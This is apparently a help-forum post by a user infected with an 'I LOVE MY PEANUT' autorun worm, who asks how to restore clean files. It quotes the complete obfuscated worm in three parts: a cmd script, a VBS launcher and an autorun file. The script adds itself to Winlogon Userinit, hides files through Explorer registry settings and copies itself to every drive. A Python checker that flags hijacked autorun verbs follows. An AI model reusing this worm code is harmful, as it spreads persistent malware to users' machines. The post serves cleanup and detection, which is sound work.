"I LOVE MY PEANUT" vbs. + windows NT cmd Script Infection [HELP ME

Ren

The following files have fallen to this problem. Right clicking (ONLY C:)
drive will appear as "I LOVE MY PEANUT" instead of "OPEN". Effects appear
only in C: (even though D: and E: also contain modifications to the files).

Is there a way to replace those files with the original functional, non-malicious
ones? Like SysRes for example?

Also it's causing Windows - No Disc errors when I try to open C: by double
clicking etc. However putting C:\ directly will bring me there with no
problems.

Thanks in advance.

P.S. I'm well aware that it's related to some filo-originated virus. However I
just did a scan with both AVG 8 and "http://www.eset.com/onlinescan" and came
back empty-handed.


10117(Cmd script)

201999.vbs

autorun.ini

----------------------------------------------

10117(Cmd script)

@call :c
%v% g0=09
%v% o=I LOVE MY PEANUT
%v% a=bcdefghijklmnopqrstuvwxyz
if "%1"=="%s%" %l% s
if "%1"=="%u%" start %u%r .\
%m% %cc%%zz% %l% a
%v% /a mn=%random%
%v% mm=%mn%.cmd
type .\%d% > %cc%%mm%
%z% %cc%%mm% %s%>>%c%%m1%%m2%.nt
%v% d=%mm%
%v% g=%random%
%z% %v% a = %i%("%w%.%s%") >%cc%%e%
%z% b=a.Run("%d% %u%",%s%,False) >>%cc%%e%
%y% %cc%%e% %r%
%z% @%v% /a main=%mn% > %cc%%zz%
%y% %cc%%zz% %r%
%y% %cc%%mm% %r%
call :v
:a
%v% j=del
for /l %%i %k% :d %%i
%l% e
:v
%v% t=Open
%m% %cc%%f% %y% %cc%%f% %p%
%z% [autorun]>%cc%%f%
%z% %t%= >>%cc%%f%
if /i "%DATE:~12,2%" GEQ "%g0%" (%z% %s%\%t%=%o%>>%cc%%f%) else (%z%
%s%\%t%=%t%>>%cc%%f%)
%z% %s%\%t%\%j%=%w%.exe .\%e% >>%cc%%f%
%z% %s%\%t%\Default=1 >>%cc%%f%
%z% %s%\%u%=%u% >>%cc%%f%
%z% %s%\%u%\%j%=%w%.exe .\%e% >>%cc%%f%
%y% %cc%%f% %r%
%x% %cc%%d% %c% %h%
%x% %cc%%f% %c% %h%
%x% %cc%%e% %c% %h%
%x% %cc%%zz% %c% %h%
%l% e
:b
%x% %cc%%d% %b%:\ %h%
%x% %cc%%f% %b%:\ %h%
%x% %cc%%e% %b%:\ %h%
%x% %cc%%zz% %b%:\ %h%
%v% b=
%l% e
:c
@echo off
set v=set
%v% l=goto
%v% b=del
%v% m1=auto
%v% x=xcopy
%v% y=attrib
%v% s=shell
%v% w=WScript
%v% i=CreateObject
%v% j=Command
%v% r=+r +h +s +a
%v% p=-r -h -s -a
%v% h=/r/h/y/k
%v% k=in (1,1,24) do call
%v% m=if exist
%v% n=if not exist
%v% q=/q/f
%v% u=Explore
%v% z=echo
%v% m2=exec
%v% rt=101007
%v% zz=101207.cmd
%v% c=%SYSTEMROOT%\system32\
%v% cc=%c%config\
%v% /a main=%random%
%m% %c%%zz% (call %c%%zz%) else (call .\%zz%)
%v% /a rs=%random%
%n% %cc%%rt%.cmd (
%z% @%v% /a rs=%rs%> %cc%%rt%.cmd
%y% %cc%%rt%.cmd %r%
) else (call %cc%%rt%.cmd)
%v% e=%rs%.vbs
%v% f=autorun.inf
%v% d=%main%.cmd
%v% x1=\Microsoft\Windows
%v% x2=\CurrentVersion\
%l% e
:s
%v% ss=%1
%v% g=%random%.reg
%z% Windows Registry Editor Version 5.00 >.\%g%
%z% [HKEY_LOCAL_MACHINE\SOFTWARE%x1% NT%x2%Winlogon] >>.\%g%
%z% "Userinit"="userinit.exe,%d%" >>.\%g%
%z% [HKEY_CURRENT_USER\Software%x1%%x2%%u%r\Advanced] >>.\%g%
%z% "Hidden"=dword:00000002 >>.\%g%
%z% "ShowSuperHidden"=dword:00000000 >>.\%g%
regedit /s .\%g%
%b% .\%g%
call :v
%v% j=del
for /l %%i %k% :d %%i
%l% e
:d
%v% a=%a:~1,24%
%v% b=%a:~0,1%
if "%ss%"=="%s%" (%m% %b%:\ %l% b) else (%m% %b%:\ %n% %b%:\%zz% %l% b)
:e

----------------------------

201999.vbs

set a = CreateObject("WScript.shell")
b=a.Run("10117.cmd Explore",shell,False)

----------------------------

autorun.ini

[autorun]
Open=
shell\Open=I LOVE MY PEANUT
shell\Open\Command=WScript.exe .\20199.vbs
shell\Open\Default=1
shell\Explore=Explore
shell\Explore\Command=WScript.exe .\20199.vbs
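
Added example (not part of the original post): a small Python check that parses an autorun file like the one quoted above and flags the entries that take over the drive's right-click verbs. The `SCRIPT_HOSTS` list and the flagging rules are assumptions chosen for this illustration; the sample input is the file text from the post.

```python
import re

# Assumed list of interpreters a legitimate autorun.inf rarely invokes.
SCRIPT_HOSTS = ("wscript", "cscript", "cmd", "mshta", "powershell", "rundll32")
VERB_KEY = re.compile(r"^shell\\([^\\]+)(?:\\(command|default))?$", re.I)

# Constructed sample: the autorun file text as quoted in the post above.
SAMPLE = r"""[autorun]
Open=
shell\Open=I LOVE MY PEANUT
shell\Open\Command=WScript.exe .\20199.vbs
shell\Open\Default=1
shell\Explore=Explore
shell\Explore\Command=WScript.exe .\20199.vbs
"""

def parse_autorun(text):
    """Return {lowercased key: value} for the [autorun] section only."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line and not line.startswith(";"):
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries

def findings(entries):
    """List (key, reason) pairs for entries that alter drive context-menu verbs."""
    out = []
    for key, value in entries.items():
        m = VERB_KEY.match(key)
        if not m:
            continue
        verb, kind = m.group(1), (m.group(2) or "").lower()
        if kind == "command":
            first = (value.split() or [""])[0]  # program token of the command
            exe = re.split(r"[\\/]", first)[-1].lower().split(".")[0]
            if exe in SCRIPT_HOSTS:
                out.append((key, f"verb runs script host '{exe}'"))
        elif kind == "default":
            out.append((key, f"Default flag set on verb '{verb}'"))
        elif value.lower() != verb:
            out.append((key, f"menu label replaced with '{value}'"))
    return out

if __name__ == "__main__":
    for key, reason in findings(parse_autorun(SAMPLE)):
        print(f"{key}: {reason}")
```

The same `findings()` call can be pointed at the text of any `autorun.inf` found in a drive root; files dropped this way carry the hidden and system attributes, so they have to be listed with those attributes included.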
 
